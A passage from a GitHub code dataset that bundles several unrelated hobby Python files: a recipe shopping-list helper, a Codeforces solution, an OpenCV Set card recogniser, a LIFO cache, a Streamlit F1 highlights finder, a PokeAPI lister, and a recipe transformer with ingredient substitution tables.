'C:\\\\Users\\\\lenar\\\\AppData\\\\Roaming\\\\JetBrains\\\\PyCharmCE2022.2\\\\scratches\\\\scratch_1.txt'\n\nreceipts = read_receipts(file_path)\nprint(receipts)\n\n# ======================================\n# #2\n# ======================================\ndef get_shop_list_by_dishes(dishes, person_count):\n ingredients = {}\n for dish in dishes:\n receipt = receipts[dish]\n for item in receipt:\n if item['ingredient_name'] in ingredients:\n ingredients[item['ingredient_name']]['quantity'] += item['quantity'] * person_count\n else:\n ingredients[item['ingredient_name']] = {\n \"measure\": item['measure'],\n \"quantity\": item['quantity'] * person_count,\n }\n return ingredients\n\n","repo_name":"Lenar1101/task-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41915290861","text":"from collections import deque\n\nn, k = map(int, input().split())\nbinary = bin(n)\npowers = deque([2**i for i, bit in enumerate(reversed(binary)) if bit == \"1\"])\n\nif len(powers) > k or k > n:\n print(\"NO\")\n exit(0)\n\nprint(\"YES\")\nones = 0\nwhile len(powers) + ones != k:\n x = powers.pop()\n\n if x == 1:\n ones += 1\n elif x // 2 == 1:\n ones += 2\n else:\n powers.append(x // 2)\n powers.append(x // 2)\n\npowers.extend([1] * ones)\nprint(*powers)\n\n\n\n","repo_name":"TobiPristupin/CompetitiveProgramming","sub_path":"CodeForces/PowersOfTwo1095C.py","file_name":"PowersOfTwo1095C.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39289519928","text":"import math\nfrom typing import Any, List, Optional\n\nimport cv2\nimport numpy as np\nfrom scipy.spatial import distance\n\nfrom setsolver.card import Card\nfrom setsolver.properties import Color, Count, Fill, Shape\n\n\nclass CardRecognition:\n def __init__(self, img=None):\n self._img = img\n self._processed_image = None\n self._processed_threshold = None\n self.shape_contours = None\n self.shape_contours = []\n self.processed_for_shade = None\n self.card_info = dict()\n self.abstract_card = None\n\n @property\n def img(self):\n return self._img\n\n @img.setter\n def img(self, value: np.ndarray):\n if value != self._img:\n self._img = value\n\n @staticmethod\n def adjust_gamma(image, gamma=1.0) -> np.ndarray:\n # build a lookup table mapping the pixel values [0, 255] to\n # their adjusted gamma values\n inverse_gamma = 1.0 / gamma\n table = np.array(\n [((i / 255.0) ** inverse_gamma) * 255 for i in np.arange(0, 256)]\n ).astype(\"uint8\")\n # apply gamma correction using the lookup table\n return cv2.LUT(image, table)\n\n def get_color(self) -> str:\n img = self._img\n colors = dict()\n boundaries = {\n \"red\": ([58, 37, 120], [100, 100, 230]),\n \"green\": ([0, 60, 0], [90, 200, 90]),\n \"purple\": ([35, 0, 35], [200, 90, 150]),\n }\n map_to_card = {\n \"red\": Color.RED,\n \"green\": Color.GREEN,\n \"purple\": Color.PURPLE,\n }\n for key, value in boundaries.items():\n # create NumPy arrays from the boundaries\n lower = np.array(value[0], dtype=\"uint8\")\n upper = np.array(value[1], dtype=\"uint8\")\n mask = cv2.inRange(img, lower, upper)\n output = cv2.bitwise_and(img, self._img, mask=mask)\n colors[key] = np.count_nonzero(output)\n most_intense_color = max(colors.items(), key=lambda x: x[1])\n color = most_intense_color[0]\n # print(colors)\n self.card_info[\"color\"] = map_to_card.get(color)\n return color\n\n def preprocess_card(self) -> np.ndarray:\n image = self._img\n img = image\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n result_planes = []\n result_norm_planes = []\n clache = cv2.createCLAHE(clipLimit=2, tileGridSize=(8, 8))\n img = clache.apply(img)\n self.processed_for_shade = img\n rgb_planes = cv2.split(img)\n # this removes the shading\n for plane in rgb_planes:\n dilated_img = cv2.dilate(plane, np.ones((7, 7), np.uint8))\n bg_img = cv2.medianBlur(dilated_img, 21)\n diff_img = 255 - cv2.absdiff(plane, bg_img)\n norm_img = cv2.normalize(\n diff_img,\n None,\n alpha=0,\n beta=255,\n norm_type=cv2.NORM_MINMAX,\n dtype=cv2.CV_8UC1,\n )\n result_planes.append(diff_img)\n result_norm_planes.append(norm_img)\n result_norm = cv2.merge(result_norm_planes)\n img = cv2.GaussianBlur(result_norm, (5, 5), 1)\n kernel = np.ones((5, 5))\n img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n # cv2.imshow(\"given to thresh\", img)\n return img\n\n def get_fill(self) -> str:\n if len(self.shape_contours) > 0:\n # preprocess image\n img = self.processed_for_shade\n sharpen_kernel = np.array(\n [[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]]\n )\n img = cv2.filter2D(img, -1, sharpen_kernel)\n # caclulate diff for every found shape take the maximum one\n current_avg: int = 255\n for contour in self.shape_contours:\n moments = cv2.moments(contour)\n center_of_shape_x = int(moments[\"m10\"] / moments[\"m00\"])\n center_of_shape_y = int(moments[\"m01\"] / moments[\"m00\"])\n left_corner_x = center_of_shape_x - 20\n left_corner_y = center_of_shape_y - 20\n right_corner_x = center_of_shape_x + 20\n right_corner_y = center_of_shape_y + 20\n within_cnt = img[\n left_corner_y:right_corner_y, left_corner_x:right_corner_x\n ]\n avg_color_per_row_cnt = np.average(within_cnt, axis=0)\n avg_colors_cnt = np.average(avg_color_per_row_cnt, axis=0)\n int_averages_cnt = np.array(avg_colors_cnt, dtype=np.uint8)\n if int(int_averages_cnt) < current_avg:\n current_avg = int(int_averages_cnt)\n\n edge_x = 30\n edge_y = 30\n top_edge_x = edge_x - 20\n top_edge_y = edge_y - 20\n bottom_edge_x = edge_x + 20\n bottom_edge_y = edge_y + 20\n\n edge = img[top_edge_y:bottom_edge_y, top_edge_x:bottom_edge_x]\n # cv2.imshow(\"proc\", img)\n # cv2.waitKey()\n avg_color_per_row = np.average(edge, axis=0)\n # calculate the averages of our rows\n avg_colors_edge = np.average(avg_color_per_row, axis=0)\n int_averages_edge = np.array(avg_colors_edge, dtype=np.uint8)\n\n diff = abs(int(int_averages_edge) - current_avg)\n print(f\"diff: {diff}\")\n if diff <= 15:\n self.card_info[\"fill\"] = Fill.EMPTY\n return \"empty\"\n elif diff > 80:\n self.card_info[\"fill\"] = Fill.FULL\n return \"full\"\n else:\n self.card_info[\"fill\"] = Fill.STRIPED\n return \"striped\"\n raise RuntimeError(\"No shapes detected\")\n\n def get_number_of_shapes(self) -> int:\n \"\"\"\n Returns the number of cards on an image and sets the main contour\n \"\"\"\n card_map = {1: Count.ONE, 2: Count.TWO, 3: Count.THREE}\n img = self.preprocess_card()\n min_area = img.size * 0.06\n max_area = img.size * 0.9\n threshold = cv2.threshold(\n img, 0, 255, cv2.THRESH_OTSU + cv2.THRESH_BINARY\n )[1]\n cnt, hier = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE\n )\n new_cnt: List[Any] = []\n central_coordinates: List[List[int]] = []\n for i, c in enumerate(cnt):\n if max_area > cv2.contourArea(c) > min_area:\n moments = cv2.moments(c)\n center_of_shape_x = int(moments[\"m10\"] / moments[\"m00\"])\n center_of_shape_y = int(moments[\"m01\"] / moments[\"m00\"])\n # if there are recorded found shapes\n all_far = True\n for coord in central_coordinates:\n dist = distance.euclidean(\n (coord[0], coord[1]),\n (center_of_shape_x, center_of_shape_y),\n )\n if dist < 50:\n all_far = False\n break\n if all_far:\n new_cnt.append(c)\n central_coordinates.append(\n [center_of_shape_x, center_of_shape_y]\n )\n # cv2.drawContours(threshold, new_cnt, -1, (255, 255, 255), 3)\n self.shape_contours = new_cnt\n self.card_info[\"count\"] = card_map.get(len(new_cnt))\n return len(new_cnt)\n\n def get_shape(self) -> str:\n if len(self.shape_contours) > 0:\n contour = self.shape_contours[0]\n epsilon = 0.01 * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon=epsilon, closed=True)\n moments = cv2.moments(contour)\n # Calculate Hu Moments\n hu_moments = cv2.HuMoments(moments)\n new_moments = []\n for i in range(7):\n new_moments.append(\n -1\n * math.copysign(1.0, hu_moments[i])\n * math.log10(abs(hu_moments[i]))\n )\n hu1 = new_moments[0]\n print(new_moments)\n if len(approx) == 4:\n self.card_info[\"shape\"] = Shape.DIAMOND\n return \"diamond\"\n if hu1 < 0.62:\n self.card_info[\"shape\"] = Shape.WAVE\n return \"wave\"\n elif 0.62 <= hu1 < 0.669:\n self.card_info[\"shape\"] = Shape.DIAMOND\n return \"diamond\"\n elif hu1 >= 0.669:\n self.card_info[\"shape\"] = Shape.OVAL\n return \"oval\"\n raise RuntimeError(\"No shapes detected\")\n\n def create_card(self) -> Optional[Card]:\n fill = self.card_info.get(\"fill\")\n count = self.card_info.get(\"count\")\n color = self.card_info.get(\"color\")\n shape = self.card_info.get(\"shape\")\n if all([fill, count, color, shape]):\n card: Optional[Card] = Card(fill, count, color, shape)\n else:\n card = None\n self.abstract_card = card\n return card\n\n def process_all_properties(self):\n self.get_number_of_shapes()\n self.get_color()\n self.get_shape()\n self.get_fill()\n self.create_card()\n","repo_name":"vidagy/setsolver","sub_path":"setsolver/image_detection/card_recognition.py","file_name":"card_recognition.py","file_ext":"py","file_size_in_byte":9271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32733788245","text":"#!/usr/bin/env python3\n\"\"\" LIFO caching module \"\"\"\nfrom base_caching import BaseCaching\nfrom collections import OrderedDict\n\n\nclass LIFOCache(BaseCaching):\n \"\"\"Represents an object that allows storing and\n retrieving items from a dictionary with a LIFO\n removal mechanism when the limit is reached.\n \"\"\"\n def __init__(self):\n \"\"\" initializing caching \"\"\"\n super().__init__()\n self.cache_data = OrderedDict()\n\n def put(self, key, item):\n \"\"\" Add an item \"\"\"\n if key is None or item is None:\n return\n if key not in self.cache_data:\n if len(self.cache_data) + 1 > BaseCaching.MAX_ITEMS:\n last_key, last_item = self.cache_data.popitem(last=True)\n print(f\"DISCARD: {last_key}\")\n self.cache_data[key] = item\n self.cache_data.move_to_end(key, last=True)\n\n def get(self, key):\n \"\"\" access an item \"\"\"\n return self.cache_data.get(key, None)\n","repo_name":"Sideeqkolade/alx-backend","sub_path":"0x01-caching/2-lifo_cache.py","file_name":"2-lifo_cache.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30390373119","text":"from datetime import datetime, timedelta\nimport streamlit as st\n\n\nfrom youtubesearchpython import *\n\n\nallVideoLinks = []\n\n\nhide_menu_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_menu_style, unsafe_allow_html=True)\n\n\n\n\nhtp=\"https://raw.githubusercontent.com/cctij69/F1_highlights/main/F1%20logo.png\" \nst.image(htp, width=350)\n\n\n\n\ngp_schedule = {\n 1: {'Grand Prix': 'Bahrain', 'Circuit': 'Sakhir', 'Date': '05 March', 'Sprint': 'No'},\n 2: {'Grand Prix': 'Saudi Arabian', 'Circuit': 'Jeddah', 'Date': '19 March', 'Sprint': 'No'},\n 3: {'Grand Prix': 'Australian', 'Circuit': 'Melbourne', 'Date': '02 April', 'Sprint': 'No'},\n 4: {'Grand Prix': 'Azerbaijan', 'Circuit': 'Baku', 'Date': '30 April', 'Sprint': 'Yes'},\n 5: {'Grand Prix': 'Miami', 'Circuit': 'Florida', 'Date': '07 May', 'Sprint': 'No'},\n 6: {'Grand Prix': 'Emilia Romagna', 'Circuit': 'Imola', 'Date': '21 May', 'Sprint': 'No'},\n 7: {'Grand Prix': 'Monaco', 'Circuit': 'Monte Carlo', 'Date': '28 May', 'Sprint': 'No'},\n 8: {'Grand Prix': 'Spanish', 'Circuit': 'Catalunya', 'Date': '04 June', 'Sprint': 'No'},\n 9: {'Grand Prix': 'Canadian', 'Circuit': 'Montreal', 'Date': '18 June', 'Sprint': 'No'},\n 10: {'Grand Prix': 'Austrian', 'Circuit': 'Spielberg', 'Date': '02 July', 'Sprint': 'Yes'},\n 11: {'Grand Prix': 'British', 'Circuit': 'Silverstone', 'Date': '09 July', 'Sprint': 'No'},\n 12: {'Grand Prix': 'Hungarian', 'Circuit': 'Hungaroring', 'Date': '23 July', 'Sprint': 'No'},\n 13: {'Grand Prix': 'Belgian', 'Circuit': 'Spa-Francorchamps', 'Date': '30 July', 'Sprint': 'Yes'},\n 14: {'Grand Prix': 'Dutch', 'Circuit': 'Zandvoort', 'Date': '27 August', 'Sprint': 'No'},\n 15: {'Grand Prix': 'Italian', 'Circuit': 'Monza', 'Date': '03 September', 'Sprint': 'No'},\n 16: {'Grand Prix': 'Singapore', 'Circuit': 'Marina Bay', 'Date': '17 September', 'Sprint': 'No'},\n 17: {'Grand Prix': 'Japanese', 'Circuit': 'Suzuka', 'Date': '24 September', 'Sprint': 'No'},\n 18: {'Grand Prix': 'Qatar', 'Circuit': 'Losail', 'Date': '08 October', 'Sprint': 'Yes'},\n 19: {'Grand Prix': 'United States', 'Circuit': 'Austin', 'Date': '22 October', 'Sprint': 'Yes'},\n 20: {'Grand Prix': 'Mexico City', 'Circuit': 'Mexico City', 'Date': '29 October', 'Sprint': 'No'},\n 21: {'Grand Prix': 'Sao Paulo', 'Circuit': 'Interlagos', 'Date': '05 November', 'Sprint': 'Yes'},\n 22: {'Grand Prix': 'Las Vegas', 'Circuit': 'Las Vegas', 'Date': '18 November', 'Sprint': 'No'},\n 23: {'Grand Prix': 'Abu Dhabi', 'Circuit': 'Yas Marina', 'Date': '26 November', 'Sprint': 'No'}\n}\n\n\n\n\n\ndef getAllRaces(gp_schedule):\n\n calendar_data = {}\n for race_number, gp_info in gp_schedule.items():\n grand_prix_name = gp_info['Grand Prix']\n date_str = gp_info['Date']\n sprint_check = (gp_info['Sprint'])\n \n\n # Convert the date string to a datetime object\n date_obj = datetime.strptime(date_str, '%d %B')\n\n # Add the year to the date object\n date_obj = date_obj.replace(year=datetime.today().year)\n\n\n # Calculate the difference between the date from the website and today's date\n date_diff = date_obj - datetime.today()\n\n # If the date is within 4 days of today or has already passed, add it to the dictionary\n if date_diff <= timedelta(days=4):\n calendar_data[race_number] = (grand_prix_name, date_str,sprint_check)\n\n for race_number, (grand_prix_name, date_str, sprint_check) in reversed(calendar_data.items()):\n button = st.button(f\"Race {race_number}: {grand_prix_name}\", key=race_number)\n if button:\n \n\n actualName = grand_prix_name\n\n\n\n FP1name = '\"FP1 Highlights | 2023 ' + actualName + ' Grand Prix\"'\n FP2name = '\"FP2 Highlights | 2023 ' + actualName + ' Grand Prix\"'\n FP3name = '\"FP3 Highlights | 2023 ' + actualName + ' Grand Prix\"'\n Quali = '\"Qualifying Highlights | 2023 ' + actualName + ' Grand Prix\"'\n PoleLap = '\"Pole Lap | 2023 ' + actualName + ' Grand Prix | Pirelli\"'\n SprintShootout = '\"Sprint Shootout Highlights | 2023 ' + actualName + ' Grand Prix\"'\n SprintShootoutPoleLap = '\"Sprint Shootout Pole Lap | 2023 ' + actualName + ' Grand Prix\"'\n Sprint = '\"Sprint Highlights | 2023 ' + actualName + ' Grand Prix\"'\n Race = '\"Race Highlights | 2023 ' + actualName + ' Grand Prix\"'\n\n\n if sprint_check == \"No\":\n raceStages = [FP1name,FP2name,FP3name,Quali,PoleLap,Race]\n else:\n raceStages = [FP1name,Quali,PoleLap,SprintShootout,SprintShootoutPoleLap,Sprint,Race]\n\n\n for stage in raceStages:\n if not YTsearch2(stage):\n stage = stage.replace('\"',\"'\")\n if not YTsearch2(stage): \n stage = stage.replace(\"'\",\"\")\n YTsearch2(stage)\n\n for item in allVideoLinks:\n st.write(item)\n \n\n\n\n\n\n\n\n\ndef YTsearch2(search_keyword):\n search = CustomSearch(search_keyword, VideoUploadDateFilter.thisYear, limit = 2)\n\n\n for video in search.result()['result']:\n title = video['title']\n\n search_keyword = search_keyword.replace('\"',\"\")\n search_keyword = search_keyword.replace(\"'\",\"\")\n\n\n if \"Pole\" in title:\n if search_keyword in title:\n if \"Shootout\" in title:\n lineToPrint = \"Shootout pole lap video - \" + video['link']\n allVideoLinks.append(lineToPrint)\n return lineToPrint\n else:\n lineToPrint = \"Qualifying pole lap video - \" + video['link']\n allVideoLinks.append(lineToPrint)\n return lineToPrint\n else:\n pass\n else:\n if search_keyword == '\"'+title+'\"':\n lineToPrint = title + \" - \" + video['link']\n allVideoLinks.append(lineToPrint)\n return lineToPrint\n elif search_keyword == title:\n lineToPrint = title + \" - \" + video['link']\n allVideoLinks.append(lineToPrint)\n return lineToPrint \n else:\n return None\n\n \n\n\n\n\n\n\n\ngetAllRaces(gp_schedule)\n\n#for item in allVideoLinks:\n# st.write(item)\n\n\n","repo_name":"cctij69/F1_highlights","sub_path":"F1_highlights.py","file_name":"F1_highlights.py","file_ext":"py","file_size_in_byte":6434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29317240703","text":"import requests\n\nresponse = requests.get(\"https://pokeapi.co/api/v2/type\")\n\n# Lag en liste av resultater fra responsen\nresults = response.json()[\"results\"]\n\n# Bruk en for-loop for å gå gjennom listen\nfor result in results:\n # Skriv ut navnet på hvert resultat\n print(\"type\", result[\"name\"])","repo_name":"navikt/atom-laerlinger","sub_path":"PokemonOppgaver/Herman/oppgave2.py","file_name":"oppgave2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25765929597","text":"from recipe_scrapers import scrape_me\nimport re\nimport nltk\nfrom nltk.tokenize import sent_tokenize\nimport nltk.tag, nltk.data\nimport spacy\nimport string\nfrom spacy.symbols import ORTH, POS, NOUN, VERB\n\nnlp_spacy = spacy.load(\"en_core_web_sm\")\n\nto_veg_link = \"https://www.allrecipes.com/recipe/24074/alysias-basic-meat-lasagna/\"\nfat_to_h_link = \"https://www.allrecipes.com/recipe/16167/beef-bourguignon-i/\"\nto_meat_link = \"https://www.allrecipes.com/recipe/244716/shirataki-meatless-meat-pad-thai/\"\n\ndescriptions = ['baked', 'beaten', 'blanched', 'boiled', 'boiling', 'boned', 'breaded', 'brewed', 'broken', 'chilled',\n\t\t'chopped', 'cleaned', 'coarse', 'cold', 'cooked', 'cool', 'cooled', 'cored', 'creamed', 'crisp', 'crumbled',\n\t\t'crushed', 'cubed', 'cut', 'deboned', 'deseeded', 'diced', 'dissolved', 'divided', 'drained', 'dried', 'dry',\n\t\t'fine', 'firm', 'fluid', 'fresh', 'frozen', 'grated', 'grilled', 'halved', 'hard', 'hardened',\n\t\t'heated', 'heavy', 'juiced', 'julienned', 'jumbo', 'large', 'lean', 'light', 'lukewarm', 'marinated',\n\t\t'mashed', 'medium', 'melted', 'minced', 'near', 'opened', 'optional', 'packed', 'peeled', 'pitted', 'popped',\n\t\t'pounded', 'prepared', 'pressed', 'pureed', 'quartered', 'refrigerated', 'rinsed', 'ripe', 'roasted',\n\t\t'roasted', 'rolled', 'rough', 'scalded', 'scrubbed', 'seasoned', 'seeded', 'segmented', 'separated',\n\t\t'shredded', 'sifted', 'skinless', 'sliced', 'slight', 'slivered', 'small', 'soaked', 'soft', 'softened',\n\t\t'split', 'squeezed', 'stemmed', 'stewed', 'stiff', 'strained', 'strong', 'thawed', 'thick', 'thin', 'tied', \n\t\t'toasted', 'torn', 'trimmed', 'wrapped', 'vained', 'warm', 'washed', 'weak', 'zested', 'wedged',\n\t\t'skinned', 'gutted', 'browned', 'patted', 'raw', 'flaked', 'deveined', 'shelled', 'shucked', 'crumbs',\n\t\t'halves', 'squares', 'zest', 'peel', 'uncooked', 'butterflied', 'unwrapped', 'unbaked', 'warmed', 'unseasoned',\n 'toasted', 'bunch', 'pre-cooked', 'taste', 'no-boil']\n\nconjunction_list = ['and', 'or', 'but', 'for', 'to']\n\ncooking_utensils = ['apple corker', 'apple cutter', 'baster', 'biscuit cutter', 'blow torch', 'pot', 'pan', 'bowls', 'pans', 'tong', 'skillet', 'wok', 'knife',\n 'bottle opener', 'bowl', 'bread knife', 'baking sheet', 'butter curler', 'cheese knife', 'cherry pitter', 'chinois', 'cleaver',\n 'colander', 'strainer', 'corkscrew', 'crab cracker', 'dough scraper', 'egg piercer', 'egg poacher', 'egg timer', 'fillet knife',\n 'fish scaler', 'scale', 'flour sifter', 'food mill', 'funnel', 'garlic press', 'grater', 'ladle', 'spoon', 'spatula', 'fork',\n 'lemon squeezer', 'lobster pick', 'measuring cup', 'meat grinder', 'thermometer', 'melon baller', 'mezzaluna', 'nutcracker',\n 'oven mitt', 'oven glove', 'peeler', 'pepper mill', 'pizza cutter', 'potato masher', 'pot-holder', 'poultry shears', 'rolling pin', 'scissors',\n 'tongs', 'whisk', 'wooden spoon', 'zester', 'cutting board', 'waffle iron', 'oven', 'microwave', 'blender', 'stove', 'aluminum foil', 'foil', 'baking dish', \n 'plastic wrap', 'wrap', 'dish', 'board', 'cutting board', 'grill', 'smoker', 'saucepan', 'mixer']\n\ncooking_actions = [\"preheat\", \"chop\", \"mince\", \"dice\", \"slice\", \"julienne\", \"grate\", \"peel\", \"crush\", \"mash\", \"puree\", \"blend\", \"whisk\", \"beat\",\n \"stir\", \"mix\", \"knead\", \"roll\", \"cut\", \"trim\", \"season\", \"marinate\", \"brine\", \"roast\", \"bake\", \"broil\", \"grill\", \"fry\", \"saute\", \"simmer\",\n \"boil\", \"steam\", \"poach\", \"blanch\", \"deglaze\", \"reduce\", \"glaze\", \"baste\", \"stuff\", \"garnish\", \"plate\", \"serve\", \"store\", \"freeze\", \"defrost\",\n \"thaw\", \"clean\", \"sanitize\", \"set up\", \"clean up\", \"heat\", \"discard\", \"pour\"]\n\nmeasures = [\"cup\", \"teaspoon\", \"tablespoon\", \"ounce\", \"fluid ounce\", \"quart\", \"pint\", \"gallon\", \"package\", \"jar\", \"can\", \"container\", \"pound\", \"clove\"]\n\nmeat_to_veg = {\n 'beef': 'portobello mushrooms',\n 'chicken': 'tofu',\n 'pork': 'jackfruit',\n 'turkey': 'tofu',\n 'lamb': 'eggplant',\n 'fish': 'tofu',\n 'shrimp': 'tofu',\n 'bacon': 'tempeh bacon',\n 'sausage': 'vegan sausage made from soy, seitan, or tempeh',\n 'ground beef': 'textured vegetable protein (TVP)',\n 'steak': 'portobello mushrooms',\n 'meatballs': 'vegan meatballs made from TVP, seitan, or lentils',\n 'hot dogs': 'vegan hot dogs made from soy, seitan, or tempeh',\n 'ribs': 'seitan ribs',\n 'meatloaf': 'vegan meatloaf made from lentils, TVP, or seitan',\n 'chorizo': 'vegan chorizo made from soy or seitan',\n 'ham': 'seitan ham',\n 'duck': 'seitan duck',\n 'beef jerky': 'vegan jerky made from soy, mushroom, or seitan',\n 'chicken nuggets': 'vegan nuggets made from soy, seitan, or tempeh',\n 'beef broth': 'vegetable broth',\n 'beef chuck roast': 'portobello mushrooms',\n 'beef sirloin' : 'portobello mushrooms'\n }\n\nveg_to_meat = {\n 'portobello mushrooms': 'steak',\n 'tofu': 'chicken',\n 'jackfruit': 'pork',\n 'eggplant': 'lamb',\n 'seitan': 'chicken',\n 'lentils': 'ground beef',\n 'black beans': 'beef',\n 'textured vegetable protein (TVP)': 'ground beef',\n 'chickpeas': 'ground turkey',\n 'mushrooms': 'beef',\n 'tempeh': 'chicken',\n 'tempeh bacon': 'bacon',\n 'coconut bacon': 'bacon',\n 'mushroom bacon': 'bacon',\n 'vegan sausage': 'sausage',\n 'vegan meatballs': 'meatballs',\n 'seitan ribs': 'ribs',\n 'vegan meatloaf': 'meatloaf',\n 'vegan chorizo': 'chorizo',\n 'seitan ham': 'ham',\n 'seitan duck': 'duck',\n 'vegan jerky': 'beef jerky',\n}\n\nfat_to_health = {\n 'sour cream': 'greek yogurt',\n 'cheese': 'low fat cheese',\n 'butter': 'coconut oil',\n 'vegetable oil': 'coconut oil',\n 'canola oil': 'avocado oil',\n 'dairy milk': 'almond milk',\n 'whole milk': 'almond milk',\n '2% milk': 'almond milk',\n 'milk': 'almond milk',\n 'all-purpose flour': 'whole wheat flour',\n 'white rice': 'brown rice',\n 'pasta': 'zucchini noodles (zoodles)',\n 'rice': 'cauliflower rice',\n 'mayonnaise or butter': 'avocado',\n 'ground beef': 'black beans',\n 'meat': 'tofu',\n 'white potatoes': 'sweet potatoes',\n 'lettuce': 'spinach',\n 'chocolate': 'unsweetened cocoa powder',\n 'ground beef': 'ground turkey',\n 'bread crumbs': 'rolled oats',\n 'sugar': 'honey or maple syrup',\n 'beef chuck roast': 'low-fat beef chuck roast',\n 'beef broth' : \"low-fat beef broth\",\n 'bacon' : 'turkey bacon'\n}\n\nhealth_to_fat = {\n 'greek yogurt': 'sour cream',\n 'low fat cheese': 'cheese',\n 'coconut oil': 'butter',\n 'avocado oil': 'canola oil',\n 'almond milk': 'whole milk',\n 'whole wheat flour': 'all-purpose flour',\n 'brown rice': 'white rice',\n 'zucchini noodles (zoodles)': 'pasta',\n 'cauliflower rice': 'rice',\n 'chia seeds': 'eggs',\n 'black beans': 'ground beef',\n 'tofu': 'meat',\n 'sweet potatoes': 'white potatoes',\n 'spinach': 'lettuce',\n 'unsweetened cocoa powder': 'milk chocolate',\n 'ground turkey': 'ground beef',\n 'rolled oats': 'bread crumbs',\n 'maple syrup': 'corn syrup',\n 'honey': 'sugar',\n 'brown sugar' : 'high fructose corn syrup',\n 'salmon steaks' : 'super fatty salmon steaks'\n}\n\n\nto_italian = {\n \"butter\": \"olive oil\",\n \"beef\": \"italian sausage\",\n \"duck\": \"italian sausage\",\n \"chorizo\": \"italian sausage\",\n \"cheese\": \"mozzarella\",\n \"herbs\": \"basil, oregano, rosemary, or thyme\",\n \"garlic\": \"fresh garlic\",\n \"rice\": \"risotto\",\n \"wine\": \"chianti\",\n \"vinegar\": \"balsamic vinegar\",\n \"heavy cream\": \"whole milk or half-and-half\",\n \"soy sauce\": \"balsamic vinegar\",\n \"cilantro\": \"parsley or basil\",\n \"ground beef\": \"ground italian sausage\",\n \"peanut oil\": \"olive oil\",\n \"sour cream\": \"ricotta cheese\",\n \"brown sugar\": \"honey\",\n \"soy milk\": \"almond milk\",\n \"ginger\": \"garlic\",\n \"white sugar\": \"raw sugar or honey\"\n}\n\nto_thai = {\n \"butter\": \"Coconut oil or palm oil\",\n \"chicken\": \"lemongrass chicken\",\n \"beef\": \"thai basil beef\",\n \"lamb\": \"massaman curry with lamb\",\n \"cheese\": \"coconut milk\",\n \"basil\": \"Thai basil\",\n \"tomatoes\": \"tamarind paste\",\n \"pasta\": \"rice noodles\",\n \"vinegar\": \"rice vinegar\",\n \"provolone cheese\" : \"thai cheese\"\n}\n\nto_gluten_free = {\n \"wheat flour\": \"almond flour\",\n \"rice\": \"quinoa\",\n \"couscous\": \"quinoa\",\n \"soy sauce\": \"tamari or coconut aminos\",\n \"tortillas\": \"corn tortillas\",\n \"pasta\": \"gluten-free pasta\",\n \"noodles\": \"sweet potato noodles\",\n \"oatmeal\": \"quinoa flakes\",\n \"all-purpose flour\" : \"almond flour\",\n \"ladyfingers\" : \"gluten free ladyfingers\",\n \"rolls\" : \"gluten free rolls\",\n \"hoagie rolls\" : \"gluten free hoagie rolls\"\n}\n\ngluten_free_to_gluten = {\n \"almond flour\": \"wheat flour\",\n \"quinoa\": \"rice\",\n \"tamari\": \"soy sauce\",\n \"oconut aminos\": \"soy sauce\",\n \"corn tortillas\": \"tortillas\",\n \"gluten-free pasta\": \"pasta\",\n \"sweet potato noodles\": \"noodles\",\n \"quinoa flakes\": \"oatmeal\",\n}\n\nto_lactose_free = {\n \"milk\": \"almond milk\",\n \"unsalted butter\": \"vegan butter\",\n \"cheese\": \"vegan cheese\",\n \"Swiss cheese\" : \" vegan swiss cheese\",\n \"provolone cheese\": \"vegan provolone cheese\",\n \"mozzarella cheese\": \"vegan mozzarella cheese\",\n \"cream\": \"coconut cream\",\n \"yogurt\": \"coconut yogurt\",\n \"ice cream\": \"non-dairy ice cream\",\n \"sour cream\": \"coconut cream\",\n \"condensed milk\": \"coconut condensed milk\",\n \"whipped cream\": \"coconut cream\",\n \"semisweet chocolate\" : \"super dark chocolate\",\n \"chocolate\": \"dark chocolate\",\n \"cream cheese\" : \"vegan cream cheese\",\n \"mascarpone cheese\" : \"vegan mascarpone cheese\",\n \"heavy cream\" : \"dairy free heavy cream\"\n}\n\nlactose_free_to_dairy = {\n \"almond milk\": \"milk substitutes\",\n \"vegan butter\": \"butter substitutes\",\n \"vegan cheese\": \"cheese substitutes\",\n \"coconut cream\": \"sour cream\",\n \"coconut yogurt\": \"yogurt substitutes\",\n \"non-dairy ice cream\": \"ice cream substitutes\",\n \"dark chocolate\": \"chocolate substitutes\",\n \"plant-based protein powders\": \"protein powder substitutes\"\n}\n\ndef removePunc(a_string):\n for char in string.punctuation:\n a_string = a_string.replace(char, \"\")\n\n return a_string\n\n\ndef preprocessSpacy():\n # retagging known entities for our spacy POS tagger\n\n ruler = nlp_spacy.get_pipe(\"attribute_ruler\")\n patterns = [\n { \n \"patterns\": [[{\"ORTH\": \"cook\"}], [{\"ORTH\": \"season\"}]], \n \"attrs\": {\"POS\" : \"VERB\"},\n }\n ]\n ruler.add_patterns(patterns)\n\nclass recipeStep:\n def __init__(self, step_num, step_text):\n self.step_num = step_num\n self.step_text = step_text\n # this should store ingredient object\n self.ingredients = []\n self.materials = []\n self.actions = []\n def __str__(self):\n return \"Step \" + str(self.step_num) + '\\n' + self.step_text\n \n def printStepIng(self):\n print(\"Step \" + str(self.step_num))\n print(\"INGREDIENTS\")\n for i in self.ingredients:\n print(i)\n print(\"\\n\")\n\nclass RecipeIngredient:\n def __init__(self, init_text):\n self.i_text = init_text\n self.ingredient = \"\"\n self.quantity = \"NA\"\n self.unit = \"\"\n self.descrips = []\n\n def __str__(self):\n return \"Text: \" + self.i_text + \"\\n\" + \"Ingredient: 